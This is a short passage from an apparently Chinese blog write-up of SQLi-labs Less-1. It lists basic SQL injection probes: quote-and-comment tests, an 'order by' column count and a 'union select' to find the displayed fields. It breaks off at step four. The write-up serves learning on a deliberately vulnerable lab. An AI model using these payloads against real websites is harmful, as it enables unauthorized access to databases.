sql-lab Basic Challenges less 1 - 22
less-1
(1)判断注入点。
?id = 1 // 正常返回
?id = 1 and 1=1 // 正常返回
?id = 1 and 1=2 //正常返回
?id = 1' and 1=2 -- a // 报错
?id = 1' and 1=1 -- a // 正常返回
判断是字符型注入。
(2)查看字段数;
?id=1' order by 3 -- a // 判断字段数为3
(3)查看回显数据,确定显示的字段的顺序;
?id=20' union select 1,2,3 -- a
(4)查看
原创
2022-05-15 14:36:32 ·
165 阅读 ·
0 评论